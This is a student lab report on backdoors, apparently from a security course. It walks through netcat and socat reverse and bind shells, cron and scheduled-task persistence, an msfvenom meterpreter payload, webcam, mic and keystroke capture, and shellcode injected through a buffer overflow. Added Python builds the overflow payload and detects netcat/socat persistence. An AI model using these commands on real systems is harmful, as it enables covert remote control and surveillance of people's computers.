20174321 Wang Baizhou Exp2 Backdoor Principles and Practice

Table of Contents

  • Principles

  • Software download and functional testing

  • Experiment content

  • Questions

  • Problems encountered and solutions

  • Experiment experience


I. Principles

(A) Backdoors

1. Concept: a backdoor is, in general, a way of bypassing security controls to gain access to a program or system. During development, programmers often build backdoors into software so that they can fix design defects later. If such a backdoor becomes known to others, or is not removed before the software is released, it turns into a security risk that an attacker can exploit like any other vulnerability.

2. Main categories:

    • Web page backdoors
    • Thread-injection backdoors
    • Extension backdoors
    • C/S (client/server) backdoors
    • Rootkits

(B) Common backdoor tools

1. Netcat/Ncat/nc

A low-level tool, also known as nc or ncat, for sending and receiving raw TCP and UDP data. It is usually combined with other tools, for example by binding a shell to a connection, to act as a backdoor. (Netcat is the original tool; Ncat is the Nmap project's rewrite with the same basic options.)

2. socat

An enhanced version of nc that relays data bidirectionally between two independent data channels. Its basic function is to create two bidirectional byte streams and move data between them; the channels can be files, pipes, devices, sockets and so on, and it supports many protocols and transports such as IP, TCP, UDP and IPv6.

3. Meterpreter

Meterpreter is the default payload Metasploit uses for Windows targets; it is delivered as shellcode and runs in memory. Metasploit is an open-source framework for finding and validating security vulnerabilities: it helps security and IT professionals identify security issues, verify vulnerability mitigations and manage expert-driven security assessments, providing a realistic picture of security risk. Its features include automated exploitation, code auditing, web application scanning and social engineering.


II. Software download and functional testing

(A) Download the ncat and socat archives on Windows

  • Download the Netcat and Socat attachments from the teacher's guidance, extract them and place them in an appropriate folder on the machine.
  • The netcat attachment the teacher uploaded crashed as soon as it was run after extraction, so I downloaded it again from the official site: https://eternallybored.org/misc/netcat/ .
  • The download was flagged as a Trojan by the antivirus; I chose to restore it and copied the extracted ncat.exe to the administrator directory.
  • Then open cmd to operate.

(B) Windows gets a Linux shell

  • On the Windows side, enter ipconfig in cmd to see the local host IP address: 192.168.1.7
  • In the Windows cmd enter nc -l -p 4321 to open a listener (the port number is the student number). -l means listen.
  • When the firewall prompt pops up, choose to allow access.
  • On the Linux side enter nc 192.168.1.7 4321 -e /bin/sh. -e runs the given program (here the shell) with its input and output attached to the connection.
  • The Windows side now has the Linux shell and can type shell commands:

(C) Linux gets a Windows shell

  • On the Linux side enter ip addr to view the Kali Linux IP address.

Here I hit a problem: Kali's eth0 interface was gone and only the lo interface was left. I found many solutions online, but none of them worked for my Kali; I came close to reinstalling Kali before finally solving it. The solution is written up in detail later.

So the Linux IP address is 192.168.246.134. (When I continued the next day after a restart, I found that the later camera steps had many problems and I did not have time to redo everything; the IP address had magically changed ... after the change it was 192.168.246.137.)

  • On the Linux side enter nc -l -p 4321 to open a listener.
  • On Windows, connect to port 4321 of the Linux host: ncat.exe -e cmd.exe 192.168.246.134 4321
  • Back in Kali Linux, Linux now has the Windows shell. At the command line you can run Windows commands; here dir is used as an example. (I forgot to take the screenshot at the time and added one from a later run.)

(D) Transfer data between Windows and Linux

  • On the Linux side enter nc -l -p 4321 (listening on port 4321 under Kali); the listener has to be up before the other side connects.
  • On the Windows side enter in cmd: nc.exe 192.168.246.134 4321 (Linux IP address and the student-number port).
  • After the connection is established, type characters on either side; the experiment result shows them arriving on the other:

III. Experiment content

(A) Use netcat to obtain the host's shell, started by cron

  cron is the Linux scheduled-task service: the cron daemon checks the crontab every minute and runs every entry whose time fields match the current minute.

  • On Linux enter crontab -e to add a cron task; when asked for an editor, choose option 3 (vim).
  • Add as the last line 20 * * * * /bin/netcat 192.168.1.7 4321 -e /bin/sh, then :wq to save and exit. (The five fields mean: at minute 20 of every hour, connect back to port 4321 on the Windows host and attach /bin/sh to the connection.)

  • Start the listener on Windows (nc -l -p 4321) before the minute arrives; if nothing is listening when cron fires, the connection is simply refused. Verify on the Windows side at 3:20:

(B) Use socat to obtain the host's shell, started as a scheduled task

  • On the Windows host press Win + R, enter compmgmt.msc and open [Computer Management].
  • Click [Task Scheduler], then [Task Scheduler Library], and select [Create Task].
  • Fill in the task name 4321w and add a new trigger.
  • Add a new action: under [Program or script] choose the path to socat.exe, and in the arguments field enter tcp-listen:4321,exec:cmd.exe,pty,stderr (this binds cmd.exe to port 4321, with cmd's stderr redirected to stdout). Without a fork option the listener serves a single connection and then exits, so the task has to run again for a second session.

  • The task is now created.

  • When the trigger fires at 20:35, a cmd window and a firewall prompt pop up; in the firewall settings choose [Allow access].
  • On the Linux side enter socat - tcp:192.168.1.7:4321 (the first parameter, -, stands for standard input and output; the second is the stream to port 4321 of the Windows host). At this point the socat shell has been obtained.

(C) Use MSF meterpreter (or other software) to generate an executable, deliver it to the host with ncat or socat, run it and obtain the host's shell

  • On the Linux side enter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.246.134 LPORT=4321 -f exe > 4321_backdoor.exe (LHOST is the Linux IP). This generates the backdoor 4321_backdoor.exe on Linux, which is then copied to the Windows side.
  • The generated backdoor can be seen in the file manager.

  • On the Windows side enter in cmd: nc.exe -lv 4321 > 4321_backdoor.exe, which puts the controlled host into receive mode; on the Linux side enter nc 192.168.1.7 4321 < 4321_backdoor.exe (Windows host IP) to push the generated backdoor to the host.
  • But here I ran into a problem where the file could not be transferred: I turned off the Linux firewall, the Win10 firewall and real-time protection and uninstalled the antivirus software, but it still would not transfer. After endless retries with many methods it finally succeeded. The backdoor that succeeded is meter_backdoor. (For details see the problems and solutions section later.)

  • On Linux use msfconsole to enter the MSF console and enter the following commands:
    use exploit/multi/handler                      // set up the listener
    set payload windows/meterpreter/reverse_tcp    // the same payload the backdoor was generated with
    set LHOST 192.168.246.137                      // IP address of the Linux side
    set LPORT 4321                                 // must match the port given to msfvenom
    exploit                                        // start listening
  LHOST and LPORT must be the values compiled into the executable: the backdoor only ever dials the address it was built with, so if the Kali address changes the payload has to be regenerated.
  • On the Windows side close the command-line window and double-click meter_backdoor.exe; back on the Linux side the Windows shell (a meterpreter session) is obtained.
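The nc push above (nc -lv 4321 > file on the receiver, nc host port < file on the sender) is a raw byte stream with no length or checksum: the receiver only knows the file is complete when the sender closes the connection, and a transfer that stops early leaves a truncated file that looks like a successful one. The following is an added example written for this page, not code from the original report, that reimplements the push over loopback and adds the check a practitioner wants: compare size and SHA-256 on both ends. The "backdoor" is a constructed random blob, not a real payload, and the stop_after parameter is an assumption used to simulate an interrupted transfer.

```python
"""Added example: nc-style file push over TCP with an integrity check.
Not part of the original lab report; the transferred file is random data."""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def receive_file(ready, dest_path, result):
    """Receiving side (`nc -lv PORT > dest`): write every byte to dest until the
    sender closes the connection, the only end-of-file signal a raw stream has."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # ephemeral loopback port for the demo
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()
    conn, _ = srv.accept()
    total = 0
    with open(dest_path, "wb") as out:
        while True:
            data = conn.recv(65536)
            if not data:
                break
            out.write(data)
            total += len(data)
    conn.close()
    srv.close()
    result["received"] = total


def send_file(host, port, src_path, stop_after=None):
    """Sending side (`nc HOST PORT < src`). stop_after (demo assumption) cuts the
    stream short to simulate an interrupted transfer. Returns bytes sent."""
    sent = 0
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        for block in iter(lambda: f.read(4096), b""):
            if stop_after is not None and sent + len(block) > stop_after:
                block = block[: stop_after - sent]
            s.sendall(block)
            sent += len(block)
            if stop_after is not None and sent >= stop_after:
                break
    return sent                         # leaving the with-block closes the socket: EOF for the receiver


def push_and_verify(src_path, dest_path, stop_after=None):
    """Run receiver and sender on loopback, then compare size and SHA-256."""
    ready = {"event": threading.Event()}
    result = {}
    t = threading.Thread(target=receive_file, args=(ready, dest_path, result))
    t.start()
    ready["event"].wait(5)
    sent = send_file("127.0.0.1", ready["port"], src_path, stop_after)
    t.join(5)
    src_hash, dst_hash = sha256_of(src_path), sha256_of(dest_path)
    return {
        "sent": sent,
        "received": result["received"],
        "src_sha256": src_hash,
        "dst_sha256": dst_hash,
        "ok": src_hash == dst_hash and os.path.getsize(src_path) == result["received"],
    }


def demo_transfer(size=200_000, stop_after=None):
    """Constructed input: a random blob standing in for 4321_backdoor.exe."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "4321_backdoor.exe")
        dst = os.path.join(d, "received.exe")
        with open(src, "wb") as f:
            f.write(os.urandom(size))
        return push_and_verify(src, dst, stop_after)


if __name__ == "__main__":
    print(demo_transfer())                    # complete transfer: ok True
    print(demo_transfer(stop_after=50_000))   # interrupted: ok False, hashes differ
```

In the real exercise the same check is sha256sum on Kali and certutil -hashfile on Windows after the transfer; a mismatch means the file on the target is not the one msfvenom produced and the handler will never get a session from it.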

(D) Use the MSF meterpreter session to capture audio, camera images, keystrokes and so on from the target host, and try privilege escalation

 1. Recording audio

Record 10 s of audio: record_mic -d 10. After recording, the save path is shown and the audio can be played back.

  2. Using the camera

Take a picture with the camera: webcam_snap

It happens quickly, so be prepared in advance. (I ran into many problems here, and I think some other students did too; I thought my computer's camera was at fault, but it was not, and in the end it succeeded.)

 3. Keystroke logging

Start capturing keystrokes: keyscan_start

Read the captured keystrokes: keyscan_dump

 4. Screenshots

Take a screenshot: screenshot

 5. Privilege escalation

View the current user: getuid

Attempt to escalate: getsystem (the escalation failed; I consulted blogs by seniors and other students, without success)

(E) Generate shellcode with MSF, inject it into pwn1 from Experiment 1, and obtain a reverse-connection shell (optional extra)

  1. Generate the shellcode (see the specific steps of Experiment 1)

  • Open terminal 1, turn off address randomization, and build the input file from the machine code obtained:
perl -e 'print "A" x 32;print "\x1\x2\x3\x4\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode2
  • Find the address of the shellcode with gdb.

  • The shellcode address is 0xffffd2bc + 4 = 0xffffd2c0; modify the generated input file accordingly, replacing the placeholder \x1\x2\x3\x4 with the address in little-endian byte order, \xc0\xd2\xff\xff.

2. MSF injection

  • Open terminal 2, enter msfconsole, and enter the following:
    use exploit/multi/handler
    set payload linux/x86/shell_reverse_tcp
    set LHOST 127.0.0.1
    set LPORT 4444
    exploit


    (The host address and port come from the downloaded notes file; they must match the 127.0.0.1:4444 embedded in the shellcode above.)

  • Return to terminal 1 and enter (cat input_shellcode2; cat) | ./pwn123. Terminal 2 can now use the shell, which proves that the reverse connection succeeded.
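The perl one-liner builds the overflow input by hand: 32 bytes of padding, the 4-byte return address typed as raw bytes, then the shellcode. The following is an added example written for this page, not code from the original report, that builds the same input with the address packed from an integer, and adds two checks worth doing before running pwn1: that no byte in the payload would end the line pwn1 reads (0x0a), and that the LHOST/LPORT the shellcode actually dials matches the multi/handler settings. The padding, address and shellcode bytes are the report's own; the small decoder only understands this particular shellcode (it looks for its push of the port and its inverted-immediate IP), which is an assumption stated in the code.

```python
"""Added example: build the pwn1 input from the report's shellcode and check it.
Not part of the original lab report."""
import struct

# The reverse-shell shellcode from the report (96 bytes); connects to 127.0.0.1:4444.
SHELLCODE = (
    b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80"
    b"\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02"
    b"\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9"
    b"\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73"
    b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01"
    b"\x31\xc0\xb0\x01\xcd\x80"
)

PADDING = 32                        # bytes from the buffer start to the saved return address
PLACEHOLDER = b"\x01\x02\x03\x04"   # stands in for the address until gdb has supplied it
SHELLCODE_ADDR = 0xFFFFD2C0         # 0xffffd2bc + 4, from the report's gdb session
LINE_END = 0x0A                     # pwn1 reads one line; a newline inside the payload cuts it short


def build_payload(ret_addr=None, shellcode=SHELLCODE, padding=PADDING):
    """padding + return address (little-endian) + shellcode. With ret_addr=None
    the placeholder is kept, as in the report's first step."""
    ret = PLACEHOLDER if ret_addr is None else struct.pack("<I", ret_addr)
    return b"A" * padding + ret + shellcode


def bad_bytes(payload, forbidden=(LINE_END,)):
    """Offsets of bytes that would terminate the line read by pwn1 early."""
    return [i for i, b in enumerate(payload) if b in forbidden]


def embedded_target(shellcode=SHELLCODE):
    """Recover the IP and port this shellcode connects to (assumption: it is the
    report's shellcode). Port: `push word 0x5c11` (66 68 11 5c) holds the port in
    network byte order. IP: `mov eax, imm32` followed by `xor eax, -1` (83 f0 ff);
    the pushed value is the inverted immediate, whose bytes are the address."""
    i = shellcode.index(b"\x66\x68")
    port = struct.unpack(">H", shellcode[i + 2:i + 4])[0]
    j = shellcode.index(b"\xb8")
    while shellcode[j + 5:j + 8] != b"\x83\xf0\xff":
        j = shellcode.index(b"\xb8", j + 1)
    imm = struct.unpack("<I", shellcode[j + 1:j + 5])[0]
    ip_bytes = struct.pack("<I", imm ^ 0xFFFFFFFF)
    return ".".join(str(b) for b in ip_bytes), port


def check_against_handler(lhost, lport, shellcode=SHELLCODE):
    """True when multi/handler's LHOST/LPORT are what the shellcode dials."""
    return embedded_target(shellcode) == (lhost, int(lport))


def write_input_file(path, ret_addr=SHELLCODE_ADDR):
    """Write the finished input file; refuse payloads that contain a line end."""
    payload = build_payload(ret_addr)
    bad = bad_bytes(payload)
    if bad:
        raise ValueError("payload has line terminators at offsets %r" % bad)
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    print("shellcode dials", embedded_target())
    print("handler LHOST/LPORT match:", check_against_handler("127.0.0.1", 4444))
    print(write_input_file("input_shellcode2"), "bytes written to input_shellcode2")
```

The decoded target is the reason the handler uses 127.0.0.1 and 4444: the shellcode carries its own connect-back address, so changing LHOST/LPORT in msfconsole without regenerating the shellcode leaves the handler waiting on the wrong port.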

IV. Questions

1. Give examples of ways a backdoor could get onto your system.

Downloading a file from a web page that insists on its own "downloader", which bundles extra software with the download; the bundled files can contain backdoors.

 2. Give examples of ways a backdoor can start itself (Windows and Linux).

Windows: startup items and scheduled tasks (as with the socat task above).

 Linux: cron jobs (as with the netcat cron entry above).

 3. Which Meterpreter features impressed you?

Meterpreter can control the camera, record audio, log keystrokes and so on, amounting to complete surveillance of the host.

4. How would you find out whether a backdoor has been installed on your system?

Scan the computer regularly with antivirus software; check the computer's logs for suspicious records; patch detected system vulnerabilities promptly. Given the methods used in this experiment, it also helps to review crontab entries and scheduled tasks for unfamiliar commands and to check which processes are listening on network ports.
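As a concrete form of the last point, and of the cron and scheduled-task persistence set up in sections III(A) and III(B), the following is an added example written for this page, not code from the original report, that audits crontab entries, scheduled-task actions and listening sockets for the indicators this experiment itself produced: a netcat/socat command line that binds a shell (-e or exec:), one that listens (tcp-listen) or dials out to host port, and a listener on an unexpected port. The sample inputs are constructed, not real system output, and the indicator patterns are an assumption about typical netcat/socat backdoor command lines; they will not catch every variant.

```python
"""Added example: audit cron entries, scheduled tasks and listeners for
netcat/socat style backdoors. Not part of the original lab report."""
import re

# Constructed sample of `crontab -l` output (not real system data).
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/apt update
20 * * * * /bin/netcat 192.168.1.7 4321 -e /bin/sh
*/5 * * * * /usr/local/bin/backup.sh
"""

# Constructed sample of scheduled tasks as (task name, action) pairs.
SAMPLE_TASKS = [
    ("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "%windir%\\system32\\defrag.exe -c"),
    ("\\4321w", "C:\\Tools\\socat.exe tcp-listen:4321,exec:cmd.exe,pty,stderr"),
]

# Constructed sample of listening sockets as (proto, local address, process).
SAMPLE_LISTENERS = [
    ("tcp", "0.0.0.0:22", "sshd"),
    ("tcp", "0.0.0.0:4321", "nc"),
    ("tcp", "127.0.0.1:631", "cupsd"),
]

# Assumed indicator patterns for netcat/socat backdoors (not exhaustive).
TOOL = re.compile(r"(^|/|\\)(nc|ncat|netcat|socat)(\.exe)?(\s|$)", re.I)
SHELL_BOUND = re.compile(r"(\s-e\s+\S*(sh|cmd)|exec:\S*(sh|cmd))", re.I)
LISTENS = re.compile(r"(\s-l\w*|tcp-listen:|tcp-l:)", re.I)
DIALS_OUT = re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\s+\d{1,5}\b")


def parse_crontab(text):
    """Return (schedule, command) for each non-comment line with 5 time fields."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            entries.append((" ".join(fields[:5]), fields[5]))
    return entries


def classify_command(cmd):
    """Reasons a command line looks like a netcat/socat backdoor (empty if none)."""
    reasons = []
    if TOOL.search(cmd):
        reasons.append("netcat/socat family tool")
        if SHELL_BOUND.search(cmd):
            reasons.append("binds a shell to the connection (-e / exec:)")
        if LISTENS.search(cmd):
            reasons.append("opens a listening port (bind shell)")
        elif DIALS_OUT.search(cmd):
            reasons.append("connects out to host:port (reverse shell)")
    return reasons


def audit(crontab_text, tasks, listeners, expected_ports=(22, 631)):
    """Return (kind, item, reasons) findings over the three data sources.
    expected_ports is the allow-list of ports known to be legitimate here."""
    findings = []
    for schedule, cmd in parse_crontab(crontab_text):
        why = classify_command(cmd)
        if why:
            findings.append(("cron", schedule + " " + cmd, why))
    for name, action in tasks:
        why = classify_command(action)
        if why:
            findings.append(("task", name, why))
    for proto, addr, proc in listeners:
        port = int(addr.rsplit(":", 1)[1])
        if port not in expected_ports or TOOL.search(proc):
            findings.append(("listener", "%s %s (%s)" % (proto, addr, proc),
                             ["unexpected listening port or process"]))
    return findings


if __name__ == "__main__":
    for kind, item, reasons in audit(SAMPLE_CRONTAB, SAMPLE_TASKS, SAMPLE_LISTENERS):
        print(kind, item, "->", "; ".join(reasons))
```

On a real host the inputs come from crontab -l (and /etc/cron.d) on Linux, schtasks /query /v on Windows, and ss -ltnp or netstat -ano for listeners; the allow-list of expected ports has to be maintained per machine.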


V. Problems encountered and solutions

1. Linux's eth0 interface was gone: only IPv6, no IPv4

Method 1: create the file with vim /etc/sysconfig/network-scripts/ifcfg-eth0, then save and exit.

(Since my Kali has no sysconfig folder under /etc, this method was not feasible; searching online showed that Kali Linux does not have a sysconfig folder.)

Method 2: vim /etc/network/interfaces

Add to the configuration file:

    auto eth0
    iface eth0 inet dhcp

Then restart the network service with /etc/init.d/networking restart, which solved the problem.

2. Backdoor file transfer failed

I failed many times here: I turned off the Kali-side firewall (and checked its state many times), killed all the security software, turned off the Windows-side firewall and real-time protection, and re-ran the experiment with other port numbers many times, and it still would not transfer. With no other option I restarted the virtual machine and Win10 and redid the experiment from scratch; ip addr showed that the Kali IP address had changed??? I then used the new Kali IP address, and it succeeded???

3. MSF Meterpreter failed to get the camera

The operation failed here, and I saw that other students also got Operation failed: 731; their interpretation was that the host's camera was broken. But my computer's camera is intact. When I came back later to finish the extra experiments, I found it succeeded. You may need to persevere.


VI. Experiment experience

This experiment was really difficult. Perhaps the Kali Linux I installed in Exp0 is not the same as other students' Kali: some of the problems I encountered could not be resolved by searching Baidu or by consulting classmates' blogs, yet after n repetitions they somehow succeeded. After this experiment I have a much better understanding of scheduled tasks, and through this simple experiment I gained a preliminary understanding of the principle of backdoors and of the whole chain of creating, implanting and using them in an attack. I was struck by the power of Meterpreter; in the future I should always protect my privacy, patch vulnerabilities, keep antivirus software updated and scan regularly so that my own computer cannot be controlled.

Origin www.cnblogs.com/w574/p/12543851.html